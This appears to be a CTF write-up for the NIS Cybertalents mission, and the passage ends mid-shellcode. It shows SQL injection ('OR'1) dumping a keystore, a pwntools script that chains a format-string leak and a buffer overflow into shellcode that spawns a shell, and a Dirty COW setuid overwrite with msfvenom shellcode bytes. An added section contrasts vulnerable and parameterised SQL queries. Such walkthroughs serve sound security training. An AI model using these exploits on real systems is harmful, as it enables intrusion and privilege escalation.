espenfjo@home:~$

NIS Cybertalents CTF Mission

The mission task is specified more vaguely than the basic tasks. It consists of six subtasks:

The README file gives a good introduction to the mission:

Situation

We have received information that an unknown threat actor has gained access to servers connected to one of our ministries. Based on the current situational understanding, few details are known about the chain of events. The threat comes from an actor abroad, LIKELY an actor with massive resources.

Initial analysis shows that the actor exfiltrates data to the domain cloud-c2-70, on port 1337/TCP. The format is unknown.

There has also been observed traffic connected to the actor against this URL: http://keystore/query.php?keyname=oper@cloud-mgr-15

Mission

We need information about the threat actor's capabilities and intention.

Initially we want to know who uploaded keys to keystore.

Further on, your task is to gain access to the server cloud-c2-70 and try to uncover what has been exfiltrated in the operation. Information about the threat actor's tools, infrastructure, certificates, and keys will be of interest.

Keystore

So let's first look at the keystore. The initial hint tells us that traffic has been observed to http://keystore/query.php?keyname=oper@cloud-mgr-15.

Querying this address gives us one SSH public key back:

$ curl http://keystore/query.php?keyname=oper@cloud-mgr-15
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRxi+RiZUVctodSwECa+ExkRlEUGlhLhX5c5drIAWmNeHW29mROl3D0smZFGvf5WSq7ff/BqKagWSBnUt2ImF0oAOVOJ8UBnCKAHWEZxg3eCzjdJhlWrlRdFO+HzHQWVrM9q7RahtWgXIgLys4lgZI5paaEvRBCnCLLnqFmzN4sFSzBsHAImx+rJzFgCT3XFs5gd5lGg7vCRGrjZsZzCAYbfYeYgge4TCk8IeCw1pwhbkKtV6mRlFI5j0IUyqzHUu/Hnj8EK/4eH8cmSOi+9rUKB3yoxxzqfBAH+bkITdhZ/O99qW4bTbEiONVVuleeTKqwRixTg3GEJHGQQNiXxur oper@cloud-mgr-1

Fiddling a bit with the query parameter gives us a list of all the keys in the database:

$ curl "http://keystore/query.php?keyname='OR'1"
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAE3r77TKxuqqUD+muVK0BPp3eQ0PKrogy6zpmWtK0rB48lOMjiPb2gKiYehuFFHiZev8H/TRDjoffVwKCAWKD9TF4o6Anj3T8SEUi88gXR9vXqoRr9T86eY+HaVv1Lt39+NW+1qmHvqUJ43EAJd9/Liga1+7CZ/A0kAWHfglrC7ABhYDVz6QPkTFNxWqHM8I769FQcsezD/Kk8T/fQZQLnxfwW54z4Yexy0W2A3xZDzuamDtW0szkkBONnRynNYHJ6Xkjfw87xxd0OtwS3dwvydJ/MyxnTeEVH1m4bsj0rZJutsYl/vKkw+ieojOrA1+laXC2DDQfPk2N+x/WCQLWMk= vault@laptop-mgr-46
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdNs2G40fwpq2rGXn5QCwz9NxGdAhJCBkcpLPSh5i9rNpHKsbcupmpmT4yaqYjF2EBJrG6/yJhKKwdxOjt3gawExzlR3fymkeXZ9L8LcTcSgD7h3tHWsjnSGER1XyHN8QMUcO0jD26VRPXE2nnSDdiW6c5p+xm6YQHjnGM+WH37yO+87chbURSujZSWELixU/rqL7L5dSuXs0gmFB9DWcIHW8Atuk5awyzAV4LkNn5sKySv+wIwoPbL7TuY9sBRXZFLJmHHLKd1I3Z1a002jqd1vuxAk6CXI4oU9uxMynpDSYG/8vu8ebEzGpXBYnzlQwlAohldfiDQy1hJN4X5lqV vault@laptop-mgr-21
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAGWCDRRlJQIHip1MPnov5rh5DMrWO8aE7Ow6dpCdEr7D2V+Cw95eu1Uw8QCjAjiHwu66hQnZT4F7ybu+UV6LesBzoHZhC99lAtyzfnS/EqEhIHOREj9zq6ECrj/zCmQm48cGwV+2eOMLRbjBnQEQGTvVK5XaWwWNGmND41mRDQoZU7UA0uNsU205yU7Pepbg8hPCJ7iedv5a97Gl5Gi6VI35FjJo+srE0/ANR+2F51GlGWiaIDlWq5jiLw1IOCt7cw5ZWEmV+mNlXTEsLTIiyoJymUct6nvRIhjvN4S64snLhvZXSh363JfQRnGSNpi5aDsyYQSLC7xBAGPVJw0tU9U= lootd@cloud-mgr-46
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9ba30K6tnVLrM6M1uSjMpi5LszJj7TSrT4RYVt+kpB9Jy2jo00XgvW7eoEBysiq83tGtN9xoVIIRh+I0iVmEbL5t76BITAH8FJrqPYqjVXIQ3huhFgzqqtjPaRb0V1NWKcVbk0KNuEgia4ZIBvL37ZA26HGEndoum46dvbgvEa6nnA5dQQIBsZMz7uZ0reABKuHEbNJ1FrBAiCn7Lcoql6hu2seO+bPuxogSOeNHA1xIK59B9d9K/W8f2LSVT/icp1qPojLHekJBR47IWXYkVSsanPnk8Q4fimopjfe2aIfl8pASjjSgjRdE4dFmEvPESB8q1K9dynZv23MZG1FsJ lootd@cloud-mgr-26
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAQ7DBO12lh70hlPg6xlKP5tqwVhu0jPRIQMIKEFfWlGAw+8KxD6t9PfgYynGduTBPlv8yNGlgDoWO+e0ohhGNPJbl9mSGXIY1WiLaGpsYiV43LjKGdxSm9eS0EV5QUCTrHhLzXnh0eqPbWot69cZSRVAFDciTHf4Ura6JdW+DVLZ0X/zEc+MhNNAPEtsaqzrhcfCjx0PDEUVEKe0UiD8Q8RWzNfKDutaTrMyb31posw8pjXopRiUvXHAllepv/xPysBOwpAh9MZxG5TQXIOp6y2z6TCi+J8LSPg33nQ4g7V0XqcO6VOGiuYbFa9sX4KLBLY8KgVdymPAfHl+NPjzb vault@cloud-c2-54
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEW99osiPFdIlDoYU4QT8hLMBZ+OziXXnrKOYNdL2Qdw nadiah@localhost
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUO4Q8Nbmu1mMnGJK5B5cKXPBlKoQAZa8Ai67BhVtZ6I3MgesMgej0dok9kBaZpWbQJ2l82KVlEpEzto2+xeaMG+8kK1a+Wxd9dVLI/R9KWGkxs0/Yxl1Wil/FZ5uniEMANvhaK9H3gzxWp2x5ly+yEBLMtwQFWh5RPKfRKTnqPUHiUBHqDa3t+jV7XOo665NhQ9+cgEM6XzRLMyj4ofnQV9GoksQGZCBm1u3jA4Mlh9V6Smf+FRvf0gVl+fw+qd8NW3DLsw5XIpp+xhIatoL4I8yW7G7WytZt3+DIac+IHUbbHkF+HzaSzyRsDif2qNJye/7cVrgkszVzd9UlkR31 vault@cloud-c2-64
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdsvsci5IVdBPdi0Du8E+xp3jh4aWDx/QjzFwPXuQtTG1GODOuCVwYLufcqNdDrdaTe7GBRa2xLFuzIX1oYUy+a4dNDJuJHYdLi7Cw33ejVsro13b4DQEFm85S11zmVmgvv0dHiy+KrNixPrDV/nRfYQQjxmc3/P0TPJcDGVNOmO9J0/v3ujroBjI8+gpuonqN3e+xvmLRzdxdNXW4VENpu0vI86FfBZ0tkrCdYMrSn80jn/5uVEJPynBildlJCp0iBSvqmkOOu994EhTlgnrIfzQJKdMGIy1gv93wcJxk17HiYgM8KcVe3AYlmWfdrwC8P4bLif63+dqyQ6kWNz37 vault@laptop-cache-51
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCjXMUP1QAV+yJBPhdHy7NdbX9HwyfRzhmXF4HiBCxpJbRnetnOtZs1TGDwOptk61AdBNNAwoHc7knRt4p+MYiBx9FVrAxqu/+hPn5rlKWJKB/wCt247bx6ThLKLRg1r2wtSd9qQX7cXB4d3OZly+1A3WdGoooWECFJBhHFcnvjZ8KxljO3FfCkfe9z6vQOb+Sf/rE9yYrPh1eoRg9d2YpwEY+4uJR56CFeEAI/LDITbV6mbDwh8xl5ruu8MSs9tdu10HWihmCAZyvCT4FcIA+q/r/a18aodwUqxVNAYX0GS2MoLJuqRY1Y9s6qmxvCyOj4kM560kaz80nuULS+kkuP oper@cloud-hq-42
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0Vw/yUrmjlVfzasi3S9gJiWHvePja3M9LyDm/UEU54HtFgh/VylsLioqeQUUDkfPKzpZ0FgDPVFehPGnuft5wb3eF6bf/SRV1zbhJChaseCziWitR+4A/Fq6bQZx98S6bZi9usfGrVw1CCD84jNETGYO5TgfbhauuK/ECvupU7KfdNr/SK2bzyYH8FZrKrPuP3ZzruojTnIAF3DxlYcF0zSZuj+j31IbWdKOdtx6B/1ydv7yJcBl/XAjBGssM0ytyYTeI7L0qSgCTUbyteJ0hy4OYUTUB7mCEnNQIMuknITMK9fKPtUCReh6HwyEuNS4M2uVQVvyr7Xsk2CU77FxP lootd@laptop-cache-84
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRxi+RiZUVctodSwECa+ExkRlEUGlhLhX5c5drIAWmNeHW29mROl3D0smZFGvf5WSq7ff/BqKagWSBnUt2ImF0oAOVOJ8UBnCKAHWEZxg3eCzjdJhlWrlRdFO+HzHQWVrM9q7RahtWgXIgLys4lgZI5paaEvRBCnCLLnqFmzN4sFSzBsHAImx+rJzFgCT3XFs5gd5lGg7vCRGrjZsZzCAYbfYeYgge4TCk8IeCw1pwhbkKtV6mRlFI5j0IUyqzHUu/Hnj8EK/4eH8cmSOi+9rUKB3yoxxzqfBAH+bkITdhZ/O99qW4bTbEiONVVuleeTKqwRixTg3GEJHGQQNiXxur oper@cloud-mgr-15
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCXshQaiVZgs27O765SM4FU+gViJuXkuv0OMd1NNtFQaMFCEaa+d7GWfG0bv6izSVo1ghbDfm3pH93MqArUB45trs/oLX0RTNqzqXAhNCzBRZk8rsi8NmYfnnMHgoL6+TwRVElLsO9UJ/g+ahak1AR1BKdAabX/G0FfiPiYxu9y0xQcDQGBCERPxZsGkOhUwwwvkqnqJoqGgWbE4JoE6cdnsRpZ+HqVB92esR6ASxiico5nI+kkzU3q7hCeNBagOCFzcBpEryiTDtQkF2MCV8CU9UOSna61bas2O+pbMvGpP6ZEdT4Eh0Zp4gi54yRoPwD0/10D0LIttgvlyumTZjqf lootd@vps-c2-40
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCaSUFSNmKUuzlnhAWRKl+5GFLcvTTNBf96MXnJQo0VtfMqhm+D3SGcyoL7a4LDNQSQz0d51fnC9g0u4sUDsATjcqKkWIDKX/dJ+/MYgichEviS+8aUSCwV0ebf1XTeRVF5IC27irV8nzuOAtTPsQfrFJsrxKNPN29n8xGu4K/GpRPoHYqQJHK8hjvBtPfBQMTg2l1ZL9NnCzl3iBZpZpzs61a/yzyIYSwdTRziIQQc3klUYJtV8Ps5FPF2r2ejH1nleiw2b/CgGegi3JXq6axebl4NiXIPGinaL7fnSArk3ReAJT53luTPwgjdwgdMazhak/3HqT2nds0FlDqg4zmb vault@laptop-mgr-58
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABADZOrVfFjESstqajNdhzwn8wlQ2zLsz9Gj5Dp1KMK6BSHULRYEpQtyPpatlPdhGgALRLYtjonjfR4LAt0asyPSPbNu7gAWALNlS/xF2iHUqiMxxj5/r4Xj8hfp7XD2TGxlVZlw5xW45t7LIVr/f1iFiWXcj6xqXzkdSKFoev43hsdt6bMYEZKdEN2Y+1w1KlKUFOWh/3yms2C/WItVJMSWeYaZcxG02JXTZFLFVAz3IryQRaVQlVizVlDGKt25wzVmTzVjAQoF9QusM7kAxcuSB8f5etGN+oPltHCacTLC6Dcn5E52mtb+xIvT5nrof6va+Zzy8Pa5nJTCEsRGihLGk= vault@cloud-c2-70
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEW99osiPFdIlDoYU4QT8hLMBZ+OziXXnrKOYNdL2Qdw arjen.lenstra@localhost
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAEMLTzLPdHVG9z03S2vfehLa/2DcTlJYecNu0uCNdUgpuiS2H3RNmVPxUKsGNgB4lisNJ5AGq2TKuKNC9tTC+rTF0ZKo0SvQUl5Qc0ySoMo+kZvwEka+S2aJxFXdDH8AyYNBy73dtRFbzdo/TUp5ULpiNxAmNpNsqej/V+X69PfxUhNvyub19phTFWFJtLnU8CgJbyRtGWjtbulkl8kDXYx/a02G6vMiUHZHhvXNrMVDr9fRGEn9Bc00mizmOkehTyVR/w9rNNHE/y99SOJXEEwLJ5Sq/1Y7RodYbZATfFL/ycbaqOi5g7cBhmjZA5VkiuovFEfNrbctd504v7wl+rk= oper@laptop-mgr-79
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXfsYexqLR/U5AsndUVPJ1zsWSkGAQLOZiOyKnhLkiVM1sh5Z46a4+ZKGc7TSaTACKKfd+cwB11EL3z/W0AiaOT98S2uv25V7ZUvHQE0qXo5KgVdxUqYPLra3hTDqcHfgBz2Ge8etASE+jwlQ9V/szc2oihHnNhtGSE8pGqa4zNsGKYTAJiG0qdg46HgcsZeoG6ArxfNTvy6hsFwt5aI7RD59WzGdW+3pwgBe2rg0fXOoV49ZFCF+3Ef0zIpDxGV9/F4E/uHRqQ4syIQkcuYNsZ6v2KN5aJaMEpKuGidukp+aQe7iovemRsbSA87WbDITLc2jT8OwIA16/lOLlO9N1 vault@laptop-c2-86
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAEj0NPpsmMhctkAa36yx+MR6uFuS55mHyIyerpvnuDcHIXb/hD522j8QOFJS3pwj1trDPOL55aMC30m1otr+eeK95UnZj2xtubyPiXL7tZQFJfraelBCaRz6Kf0GWN7HSdAWGSxJ0Npr5nteAtcHPRqx4SMnTfEn9J3Vh4GJUc0Mo597qQT6nQFYhTdJrUl2D0zqdVlY/6bLSXgF83bXFYPpk4UpGW7azL8Qr5eBZWBXadzYvPWdhT88NpHRx8bfpw4u3E/a3N/WCr1Ry6B4KhBtrvkSbSHn5fcM34hXwo9eJV2sr16zoq7CY2C9XL/kyp9bH/AQPPfHP5oJ9VWRJgk= oper@laptop-c2-25
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAE6TrdELYMzOjf8ZLqCJaP11oumuoNvRiDuu/NbpXDTCK6catMg/zHTDziOxHxwQd38nfr3HUF9K+TWCr7Rne6nsyHATWpcY2aBIQIreAD4JnGUgJ6ZlcuuGRkVlJtEc+UXc7CkzHVFat2NqbvM2mu11IPjTB80PdCEDAN2TVVtv+q2rPpTLtBkPWyRJX6g2POt+z9DjK1xpGdi6c80LzHtIsrog81iW1fmSvejwZNC+NZqeSlYIZf6kqtdq7vx5xNuYpSV9ajELoMjySG3YGENqejDAFPQOGu33V9LJtkDaH3L2HnxeXtKZxAry017bCI7eqsxmOH6K0SJaRgp6dVk= oper@cloud-c2-57
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAFyOYKiX0NxY7XU37SPrp60gkkdd5V7Cm4xx6toIoP5cAGfboG12KKs+zDszyYlvEDRT8NgauuylF8J7LVI8C59G6cdtgovw1FA0eojBi+b1SNopLcWRoDDSB0xBWKGcMNbxRkgKknSVM+bDunaKRIdwEdz1jK6mebGzj1aTADubPfvPEt5C5hwKI8v4+VqtUyVG5zx7kYOyKVCUO+qPCW3Gs1rCmYDFd7zrMl9dyAhMTINUeBJkHD+rrfrBYJ3XCGTzG03CDKKte5RJywE/I00wNHJTATqfiuLoWfm6gugCXEeuvpMlJ+jfzMoR9vmeW5I6pELbn4wv5W4VAAcL7nM= vault@laptop-cache-1
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZxGzQI7SFNQdKFCujuiMHf0j9nqfaQYZ8RsD/eMBcd1B7qtoP4YPrwP2XTr0TcRW7zuw0HMfd4PkcqFOpCvWELF56zTqrbYQg5CCRYyKwrQfVTuizLt0v+uN8DiOQK8HRZ4DeoU4wIWYmH/ep/ZQNS4RQ8g9RnbjNnJe1hn2iSlguA9ToT7OkGuhe59f/gBdzZQJA3MFtmhIc96zwH+5LyoJyYt/6U/j9ApMSHO2XeacbZvQOOkSo29MX6LRQmQcEYmrl6u4Lc+0NFdhMbacc6YHkpw9Wf48I27Uf0rptHJF/HaeXT2AZjU1m8dLC5/qDnPvdJVPRLZO9wljRp04R vault@cloud-cache-73

This confirms that the system is vulnerable to SQL injection attacks. But I forgot to log my queries to dump all the various tables.
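The behaviour above, as an added example that is not the CTF's query.php: a constructed SQLite stand-in for the keystore, with the string-concatenated lookup beside a parameterised one, showing why keyname='OR'1 returns every row and how the fix stops it. Table layout, sample rows and the keyname allow-list are assumptions.

```python
import re
import sqlite3

# Constructed sample rows: comments follow the keystore naming, key blobs are dummies.
SAMPLE_KEYS = [
    ("oper@cloud-mgr-15", "ssh-rsa AAAA...constructed1 oper@cloud-mgr-15"),
    ("vault@cloud-c2-70", "ssh-rsa AAAA...constructed2 vault@cloud-c2-70"),
    ("nadiah@localhost", "ssh-ed25519 AAAA...constructed3 nadiah@localhost"),
]


def make_keystore() -> sqlite3.Connection:
    """In-memory table shaped like a keyname -> pubkey lookup (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE keys (keyname TEXT PRIMARY KEY, pubkey TEXT NOT NULL)")
    conn.executemany("INSERT INTO keys VALUES (?, ?)", SAMPLE_KEYS)
    return conn


def query_vulnerable(conn: sqlite3.Connection, keyname: str) -> list:
    """String concatenation: keyname becomes part of the SQL text, so the
    value 'OR'1 turns the WHERE clause into keyname='' OR '1', which is
    true for every row."""
    sql = "SELECT pubkey FROM keys WHERE keyname='" + keyname + "'"
    return [row[0] for row in conn.execute(sql)]


# Allow-list matching the user@host shape of every keyname seen in the write-up.
KEYNAME_RE = re.compile(r"[A-Za-z0-9._-]+@[A-Za-z0-9.-]+")


def query_safe(conn: sqlite3.Connection, keyname: str) -> list:
    """Bound parameter plus allow-list: the value is never interpreted as SQL."""
    if not KEYNAME_RE.fullmatch(keyname):
        return []
    rows = conn.execute("SELECT pubkey FROM keys WHERE keyname = ?", (keyname,))
    return [row[0] for row in rows]


def compare(payload: str):
    """Return (row count from vulnerable lookup, row count from safe lookup)."""
    conn = make_keystore()
    return len(query_vulnerable(conn, payload)), len(query_safe(conn, payload))
```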

lootd

Connecting to cloud-c2-70 on port 1337 gives us a very limited shell; more precisely, it spawns the process lootd and connects us to it:

$ nc cloud-c2-70 1337
> ls
./lootd: unknown command: 'ls'
> id
./lootd: unknown command: 'id'
> ?
./lootd: available commands: help, upload, download, uname, uptime
> uname
Linux bovinae 4.8.0+ #1 SMP Thu Oct 13 20:07:36 UTC 2016 x86_64 Linux
> uptime
 13:48:33 up 1 day,  6:06,  load average: 1.90, 1.94, 1.99
>

Trying to download arbitrary files asks us to supply an access token we do not have.

> download
filename > /etc/passwd
access token > password
done. 0 bytes

However, trying to download lootd itself gives us the contents of the file:

> download
filename > lootd
00000000  7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 | .ELF............
00000010  03 00 3e 00 01 00 00 00 90 11 00 00 00 00 00 00 | ..>.............
00000020  40 00 00 00 00 00 00 00 80 31 00 00 00 00 00 00 | @........1......
00000030  00 00 00 00 40 00 38 00 09 00 40 00 18 00 17 00 | ....@.8...@.....
00000040  06 00 00 00 04 00 00 00 40 00 00 00 00 00 00 00 | ........@.......
....
00003760  b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
00003770  01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
done. 14208 bytes

This lets us disassemble and decompile lootd to better understand what it does. By looking at the file I can discern at least two severe vulnerabilities:

  1. A Format String Vulnerability in the command input
  2. Buffer overflow in the upload command

By utilizing both of these we should be able to execute arbitrary code. Since the server uses ASLR we cannot reuse memory addresses found by exploiting the binary locally; luckily, we can use the format string vulnerability to leak addresses from the stack:

$ nc cloud-c2-70 1337
> %016lx %016lx %016lx %016lx %016lx %016lx
./lootd: unknown command: '0000565121fd40e7 00000000ffffffff 0000000000000000 00007ffe44471aa8 0000000000000000 00007ffe44471cf0'
>

From analysing the binary locally we see that 00007ffe44471cf0 is well onto the stack, and we should be able to use this address together with the buffer overflow vulnerability in the upload command to execute arbitrary code. Let's create a small Python script to help us with this.

#!/usr/bin/python3
from pwn import *

context.update(arch="amd64", endian="little", os="linux")

r = remote("cloud-c2-70", 1337)

# Step 1: use the format string bug in the command parser to leak six stack
# words; lootd echoes the formatted string back in its "unknown command" error.
r.sendlineafter(b"> ", b"%016lx %016lx %016lx %016lx %016lx %016lx")
reply = r.recvline().decode()
# reply looks like: ./lootd: unknown command: '<w1> <w2> <w3> <w4> <w5> <w6>'
# We are only interested in the last address; strip the closing quote.
address = reply.split(" ")[8].strip("'\n")
log.info("Stack is at: %s", address)
address = int(address, 16)  # parse the hex string into an integer
log.info("Nop sled size is %d", 0x100)
log.info("Lets try to point RIP at %s (should hopefully contain our nop sled)", hex(address))

# Step 2: overflow the buffer read by the upload command: 72 bytes of padding,
# then the leaked stack address as the new return address, then the sled and payload.
buf = b"A" * 72
buf += p64(address)
buf += b"\x90" * 0x100  # large NOP sled
buf += asm(shellcraft.sh())  # pwntools shellcode that spawns /bin/sh
r.sendlineafter(b"> ", b"upload")
r.sendafter(b"size >", buf)
r.interactive()

Running this script gives us a shell and access to the first two flags:

$ python3 shell.py
[+] Opening connection to cloud-c2-70 on port 1337: Done
[*] Stack is at: 00007ffc15e02430 
[*] Nop Sled size is 256
[*] Lets try to point RIP at (Should hopefully contain our nop sled): 0x7ffc15e02430
[*] Switching to interactive mode
 $ 
$ ls
FLAG
lootd
$ id
uid=1000(lootd) gid=65534(nobody) groups=65534(nobody),65534(nobody)
$ uname -a
Linux 976a797be6b3 4.8.0+ #15 SMP Thu Oct 13 20:07:36 UTC 2016 x86_64 Linux
$ cat FLAG

  ....                                                   . .  .
 .<X1|:                                  .____==i|||i||*|||+||+||||||==,_,
  -nc=___..               ...____=<|||ii*||+||+|=;=;;;;::::::.:......:==+:
   de.:=+++||||||||||||||*|||++|+|======;=======saa=;;;::::.-.-..-..:-::::.
  .3e....---.:-:-::::::;;::;;==;=;=============qQQWmgc:;:::::.:.-..-.:::::.
   de ..:.-.:---::::::;:;;=wmQw>==============)QWQWWB(:;:::-.:..-.-.:.::::
  .3e...-.:.:.::-:-::::;=wmWWWWm===swwmQQmQmywUW@Y!+;;;:;::::.--..-.-:::::
   de .-.:.--:--::::::;;=YV#B$WB$mQQWQQWWQQWQWWm>:=;=;;::::---.:.-..:.::::
  .3e...:..:.:.::-::::;:;::;;;vmQWQWQQQQQQQQQQQWz===;;;;::::---...-.-:::::
   de....--.:.::::::::;;;;;=;=mQQQQQWWQQWVTTVWQW(==;=;;:;:::.:.-.:..:.::::
  .3e ..:.---::.::::::;:;;;;;=WWWV!++<WWe;===3WC====;;;;::::.:.-...-.:::::
   de....-.:.:.:::::::;;;;;;==)Wm====wWWmwaawWB=====;;;:::::-.:.-.-.:.::::
  .3e...:.:.:.:::-::::;:;;;;;;;3QQgmQWwamWWB#mmw>+===;;;::::.:..-.-.-:::::
   de ...-.:.::.::::::;:;;;;==ammm?WQQWWWBV|?HWWQWQQmc;:;:::.:.:...-.:::::
  .3e..--.:.:.::::::::;;;;<awmQWT+=<I2X3*!+===)QWQWBT(;:::::.:...-.--:-:::
   de....:.-.:.:-::::::;=mWWWWWC======;;=======!VHV(:;;:;::-:.--..-.--::::
  .3e ..:..:-:-:-:::::;::??$WWD(;================;;;;;;::::-.:..-..-.:::::
   de....--.:.:.:::::::;;;;+!+=;;=;===========;;;:;:::.:.............--:::
  .3e ..-.--.:.::-:::::;:;;;:=;;;;;:::----- -  .                       . .
   de.   . ................- - . .
  .3e;
   de.                                                            ╭──────╮
  .3e.                                ╭───────────────────────────╯ FLAG │
   31.                                │ 3f8762b6ff18b83da8767251dbf05fc5 │
  .3e.                                ╰──────────────────────────────────╯
$ cat ../FLAG

   ._s,,, ....                             ╭──────────────────────────────────╮
  idm###mqmmmmmwos,                        │ bf54b6ffcdd9309b884ad922ec961611 │
 =dXXm#WmWWmWBWWB#qwwwwwaa%,               ╰───────────────────────────╮ FLAG │
 =IX#mWWWWWWW8#mm#mBmmmmWmmmms,                                        ╰──────╯
 .vX#WWWWWBAqmmmBWWWWWWWBWWW#Sooouaaas,=_.
 :vXZmWW#SqmmWWWWBWmWBWWWVSowX####UZZX###Zqai,
 .vS#m#Sw#mWWWBWWWBWW@Ynud###mmmmmmmmm##UZZZXXoc.
  =3ZUnXZmmBmBmmmBWV1um##mmBWBWWWWBWmWmmmmm###ZXoc.
   +YvXXmmmBmmmm#SaX###mBWWWBWBBBBWmWBWWBWBBmmm#mSo,
    =oXZ####Z#ZSnXU###BWBWmWBWBWWBWBWBWmWmWWmWmm#XSo;
   .iXX#XZZZZYvdX###mBWmWWBWBWmWmWBWmWBWBWBWWmBmm#Xdm}!*Ynowaas,.
   .{nSXXZXX1nXZ####mWmWWmWBWBWWBWBWBWBWmWBWmWmBm#X3Qc      -"!Y$ma%.
    +ISoX2XlnXXXZ##mBBWBWWBWmWmWBWmWBWmWBWmWBBBmm#omQm.  :-::.   "?$mwc.
     ={nXXlv2SXX#U#mmWmWBBWmWWBWmWBWmWBWmWWBWmWm#XmQQk  .::::;===;.:+9#ms.
       +{1vn2oSXXZ#mmmWBWBWBWmWmWBWmWBWmWBBWmWm#ZmQWB^  :;;;====+|||=|IVWm;
         <vv1noXXX#UmmmBBBBWBWBWBWmWWmWBWBWmWm#mWQWB(  ;;===+++||+||iiiI3$Qc.
        .|ivn12nXXXXZmmmmWmBBWmWBBWBBWBWmWBW#mmWWWZ^ .====+|+||||iiillvIvXWmc
         <|lvvn11oXXXX##m#mBmmBmBWmWmWmBWmm#m#mWmZ` :=+++||||iiiiilIvvvnnoXWm;
         :|lllvn21nnXXXSXUZ####mm#mmmmmBmB#X#mWWZ` ==||||iiillvvvvnvnnnoooXBms.
          <ililivnn11noSSSSXXZZ#Z########&SXmWW#^ :+||||iIvvIvnnnoonoo222SXmmc:
           =illIilvvnonnvo2S2SXXXXXXXZZZZoSS#WWE..=||iilivnvvo22ooSoS2XSSSXm#i;
           -=|iillilllvvnnnvnonoo222S2SSSnnX#WWh..||iilvvnoo2SSXSS2X2XXXSXZm#|`
             :+|i|illlIIIIvvvvvnvnnnnnnnnvIvXWWm;-||lIvvvn2S22XXXXXXSSXXXX##e=
              -=||||||iiiiillIvlvvvvvIvvIliiX#WWz <ilvnnoSSSSXZZZZXXXXXXZZ#Zl;
                -=||ii|i|iiiiiiiiiiiillili||{X#Qmc-ivnoSXXXZZZ##ZZZZZZZZZ#Ze>
                  -=+|||||||||i||i|ii|ii|i||=|3#Wma=voXXXZZ#Z##U#Z#ZZZZUZZ2|
                     -=++||+|||||||||||||||||=+*X#Qmwu1XXXZZ#Z#ZZZUU###XX}>
                        --=|++|+|+||+||||||||||==|YXWBmguonoSXXUmmmm##Xe|~
                            ---==++=++=++++|+||||=;=~"?VHWmQmmmm###X1*~-
                                    ----~~------~~~~~~~---++++||+~--
$

Looking around on the system gives us several clues as to what has happened, what has been exfiltrated, and to where:

$ ls -l /vault
total 24
drwx------    2 vault    users        20480 Feb 12 00:42 loot
$ ls -l /usr/sbin/moveloot
-rwsr-sr-x    1 vault    users        14112 Feb 12 00:42 /usr/sbin/moveloot
$ find /home
/home
/home/FLAG
/home/lootd
/home/lootd/FLAG
/home/lootd/lootd
/home/oper
/home/oper/bin
/home/oper/bin/crypt0r
/home/vault
/home/vault/.ash_history
$ cat /home/vault/.ash_history
curl -o /tmp/xxx http://keystore/query.php?keyname=oper@cloud-mgr-72
cat /tmp/xxx
rm -rf /tmp/xx
exit
find /vault/loot -type f
find /vault/loot -type f | wc -l
du -ms /vault/loot
curl http://keystore/query.php?keyname=oper@cloud-hq-42
vi id
tar cz /vault/loot | ssh -i id oper@cloud-hq-42 lootimport
rm id
exit

loot

loot the hard way

Luckily for us, kernel version 4.8.0+ is vulnerable to the infamous Dirty COW (CVE-2016-5195) attack.
The Dirty COW website tells us that we can basically do what we want:

An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.

Since the /usr/sbin/moveloot binary is setuid (owned by vault), we should be able to gain access to the vault user, and therefore to the /vault/loot directory.

Let's try...

I am using the cowroot.c exploit, and a shellcode generated by msfvenom to overwrite the binary with chmod -R 777 /vault. I could have spawned a shell as well, but let's try something new…

I modified the shellcode generated by msfvenom to set my effective user ID to the vault user, and changed the setuid binary to exploit to /usr/sbin/moveloot.

unsigned char sc[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  0xdf, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x01, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
